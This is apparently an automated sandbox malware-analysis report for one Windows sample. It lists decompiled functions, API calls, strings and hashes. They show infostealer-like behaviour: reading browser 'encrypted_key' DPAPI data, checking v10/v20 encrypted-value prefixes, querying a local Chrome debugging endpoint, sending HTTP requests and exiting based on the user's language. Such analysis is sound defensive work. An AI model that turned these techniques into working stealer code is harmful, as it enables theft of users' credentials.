strtok_s.MSVCRT ref: 00411A38

Strings

block, xrefs: 00411A07

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
Opcode Fuzzy Hash: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A

Function 00415510 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,00976668), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,00975EE8,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
lstrlenA.KERNEL32(00000000), ref: 0041557F

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
lstrlenA.KERNEL32(00000000), ref: 004155D3
strtok.MSVCRT(00000000,?), ref: 004155EE
lstrlenA.KERNEL32(00000000), ref: 004155FE

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

ERROR, xrefs: 00415682
ERROR, xrefs: 00415609
ERROR, xrefs: 004156F9
ERROR, xrefs: 004156BF
ERROR, xrefs: 0041555A
lXA, xrefs: 0041570E, 004156D4, 00415697, 0041565A, 0041561E

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
API String ID: 3532888709-2643084821
Opcode ID: b61c4c89f9994b5c984b5bf237e3171df766cefd4c1e86929edb5afb8fd3dece
Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
Opcode Fuzzy Hash: b61c4c89f9994b5c984b5bf237e3171df766cefd4c1e86929edb5afb8fd3dece
Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A

Function 00411520 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411557
strtok_s.MSVCRT ref: 004119A0

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 1daaeda73675648e445032a392a540dd0da9cb6deb57e6634cfbc1c142934181
Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
Opcode Fuzzy Hash: 1daaeda73675648e445032a392a540dd0da9cb6deb57e6634cfbc1c142934181
Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95

Function 004144D0 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004144EE
memset.MSVCRT ref: 00414505

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 0041453C
lstrcatA.KERNEL32(?,00975FC0), ref: 0041455B
lstrcatA.KERNEL32(?,?), ref: 0041456F
lstrcatA.KERNEL32(?,00973F60), ref: 00414583

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563

StrStrA.SHLWAPI(?,00975F00), ref: 00414643
GlobalFree.KERNEL32(?), ref: 00414762

Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrcatA.KERNEL32(?,00000000), ref: 004146F3
StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
lstrcatA.KERNEL32(00000000,?), ref: 00414735
lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1191620704-0
Opcode ID: 02513212d47ca0910353f274b1dd42a9c60e4222ad3b8c8228f08e1041f009a1
Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
Opcode Fuzzy Hash: 02513212d47ca0910353f274b1dd42a9c60e4222ad3b8c8228f08e1041f009a1
Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55

Function 61E970B9 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 447COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E97281

Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D

Strings

sqlite_stat1, xrefs: 61E97504
idx IS CASE WHEN length(?4)=0 AND typeof(?4)='blob' THEN NULL ELSE ?4 END , xrefs: 61E975CB
IS ?, xrefs: 61E975EC
= ?, xrefs: 61E97571
WHERE , xrefs: 61E97357
bua, xrefs: 61E9733E
SET , xrefs: 61E9732E
AND , xrefs: 61E97604
bua, xrefs: 61E97368
UPDATE main., xrefs: 61E9730B

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: freememcmp
String ID: = ?$ AND $ IS ?$ SET $ WHERE $UPDATE main.$bua$bua$idx IS CASE WHEN length(?4)=0 AND typeof(?4)='blob' THEN NULL ELSE ?4 END $sqlite_stat1
API String ID: 1183899719-1341641573
Opcode ID: a4619ef3427869a35f6bfc4a872bcdda3baedda7772fcac0fbc76971867d68f5
Instruction ID: 0d5b731b4e6e71452f02b40a28acc7cf76705435dae47c5a45c9821af7cd2139
Opcode Fuzzy Hash: a4619ef3427869a35f6bfc4a872bcdda3baedda7772fcac0fbc76971867d68f5
Instruction Fuzzy Hash: AE12E774E04259DBDB04CF98D480A9DBBF2BF88308F25C869E855AB351D774E886CF81

Function 61E3C943 Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 360stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 61E3CC03
strncmp.MSVCRT ref: 61E3CC58
strncmp.MSVCRT ref: 61E3CCA9

Strings

true, xrefs: 61E3CC4D
false, xrefs: 61E3CC9E
null, xrefs: 61E3CBF8
-, xrefs: 61E3CD00
], xrefs: 61E3CDC5
}, xrefs: 61E3CDBB
0, xrefs: 61E3CCF9
-, xrefs: 61E3CCF0

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: strncmp
String ID: -$-$0$]$false$null$true$}
API String ID: 1114863663-1443276563
Opcode ID: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
Instruction ID: 7d0d7d581299a88f4ecf4101ed3cb2921062378b47abb911dec42016596cbabc
Opcode Fuzzy Hash: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
Instruction Fuzzy Hash: 4BD1DF70B482768ADB12CFA8C4443DABBF2AFCA318F69C25BD4919B281D739D446C751

Function 00409A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
InternetCloseHandle.WININET(00000000), ref: 00409AC7

Strings

http://localhost:9229/json, xrefs: 00409A9F
"webSocketDebuggerUrl":, xrefs: 00409B4B
"ws://, xrefs: 00409B84

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 3289985339-2144369209
Opcode ID: f6ea82a8e87bece4c9da886c2de84f051623a7f4925580be6bfbf86350bd66ae
Instruction ID: 62dbe43bf40bcea2ec6919899f10ce169cdfcd29f6908f6eb26e58a13f6c9638
Opcode Fuzzy Hash: f6ea82a8e87bece4c9da886c2de84f051623a7f4925580be6bfbf86350bd66ae
Instruction Fuzzy Hash: 27414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505B6191DBB8AEC0CF68

Function 61E44905 Relevance: 13.8, APIs: 6, Strings: 3, Instructions: 346COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E44953
memcmp.MSVCRT ref: 61E44A05
memcmp.MSVCRT ref: 61E44BC9
memcmp.MSVCRT ref: 61E44C16
memcmp.MSVCRT ref: 61E44C7A
memcmp.MSVCRT ref: 61E44CAE

Strings

@, xrefs: 61E44922
access, xrefs: 61E44BE0
cache, xrefs: 61E44CA7, 61E44CC5

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: memcmp
String ID: @$access$cache
API String ID: 1475443563-1361544076
Opcode ID: 6a756704d9a5e632f7fc2e1c6f732c660ad2fd9c7916c21d548a59f960e475b6
Instruction ID: bf7f6bc55254c54d21197c9aa673ce015ae0bdc4e4658c964804263f7089fac0
Opcode Fuzzy Hash: 6a756704d9a5e632f7fc2e1c6f732c660ad2fd9c7916c21d548a59f960e475b6
Instruction Fuzzy Hash: FDD16FB4A083558FEB11CFA4D48039EBBF1AF89318F28C45ED895AB341E339D841DB55

Function 61E241D7 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 180stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 61E24268

Strings

bua, xrefs: 61E24252
NULL, xrefs: 61E243A4
ya, xrefs: 61E2427F
Xya, xrefs: 61E24418
(blob), xrefs: 61E2439F
ya, xrefs: 61E2429A
program, xrefs: 61E24457
bua, xrefs: 61E24274

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: strcmp
String ID: ya$ya$(blob)$NULL$Xya$bua$bua$program
API String ID: 1004003707-2454903709
Opcode ID: 159ce7650a377ea6ea6ab72cd320b4004e236130d8e3e4a11b54add8b656ccd7
Instruction ID: 4befd86826370bfd8630e1afa8d422750160e2b9b2ea18a9ced5634f5bcee847
Opcode Fuzzy Hash: 159ce7650a377ea6ea6ab72cd320b4004e236130d8e3e4a11b54add8b656ccd7
Instruction Fuzzy Hash: 3B7115B49097469FC708CF58C191A59BBF0BF8A304F25C85EE8A89B751D335D882CF92

Function 00416A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
ExitProcess.KERNEL32 ref: 00416A45
ExitProcess.KERNEL32 ref: 00416A4F
ExitProcess.KERNEL32 ref: 00416A59
ExitProcess.KERNEL32 ref: 00416A63
ExitProcess.KERNEL32 ref: 00416A6D

Strings

*, xrefs: 00416A2C

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52

Function 0040A560 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
memset.MSVCRT ref: 0040A60B
LocalAlloc.KERNEL32(00000040,?), ref: 0040A664

Strings

v20, xrefs: 0040A571
v10, xrefs: 0040A5C6
@, xrefs: 0040A614

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: memcmp$AllocLocallstrcpymemset
String ID: @$v10$v20
API String ID: 631489823-278772428
Opcode ID: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
Opcode Fuzzy Hash: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
